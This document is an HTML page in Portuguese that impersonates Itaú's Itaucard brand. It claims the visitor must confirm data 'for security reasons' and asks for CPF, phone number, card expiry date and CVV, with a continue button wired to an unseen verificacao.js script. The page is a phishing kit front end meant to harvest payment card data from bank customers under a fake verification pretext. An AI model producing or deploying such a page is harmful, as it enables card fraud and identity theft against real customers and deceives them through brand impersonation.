<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificação - Itaucard</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>

    <div class="topo">
        <span class="texto">Itaucard</span>
        <img src="https://i.ibb.co/P93gD8p/IMG-20241209-WA0100-removebg-preview.png" alt="Descrição" class="imagem">
    </div>

    <!-- Linha cinza abaixo do texto -->
    <hr class="linha-cinza">

    <div class="circulo-container">
    <!-- Primeiro círculo -->
    <div class="circulo">
        <span class="numero">1</span>
        <!-- Primeira linha -->
        <div class="linha-direita"></div>
        <!-- Segundo círculo -->
        <div class="circulo-contorno">
            <span class="numero">2</span>
            <!-- Segunda linha -->
            <div class="linha-direita-2"></div>
            <!-- Terceiro círculo -->
            <div class="circulo-contorno-3">
                <span class="numero">3</span>
            </div>
        </div>
    </div>
</div>

    <!-- Texto abaixo dos círculos e linhas -->
<div class="texto-confirmacao">
    <p>Olá cliente Itaú, por motivos de segurança, você precisa confirmar os seguintes dados abaixo.</p>
</div>
    
    <div class="formulario-container">
    <div class="formulario">
        <label for="campo1">CPF</label>
        <input type="text" id="campo1" name="campo1" placeholder="Digite algo...">
    </div>
    <div class="formulario">
        <label for="campo2">Telefone</label>
        <input type="text" id="campo2" name="campo2" placeholder="Digite algo...">
    </div>
    <div class="formulario">
        <label for="campo3">Data de Validade</label>
        <input type="text" id="campo3" name="campo3" placeholder="Digite algo...">
    </div>
    <div class="formulario">
        <label for="campo4">CVV</label>
        <input type="text" id="campo4" name="campo4" placeholder="Digite algo...">
    </div>
</div>
    
    <div class="container">
    <!-- Todo o conteúdo vai aqui -->
    <div class="botao-container">
        <button class="botao-continuar">Continuar</button>
    </div>
</div>
    
    <script src="verificacao.js"></script>
    
    <p class="footer">Crédito Rápido e Seguro no Seu Cartão Itaú

No ItaúCard, oferecemos uma maneira fácil e rápida de acessar crédito diretamente no seu Cartão Itaú. Com aprovação instantânea, parcelamento flexível e total segurança, você tem o controle das suas finanças de forma simples e sem burocracia. Aproveite agora e tenha a liberdade que você merece!
</p>
    
    <img src="https://i.ibb.co/b1KpYBb/fd02ed19a3c83c79f8a8b9a77fffa243-1-removebg-preview.png" alt="Descrição da imagem" class="imagem-centralizada">
    
</body>
</html>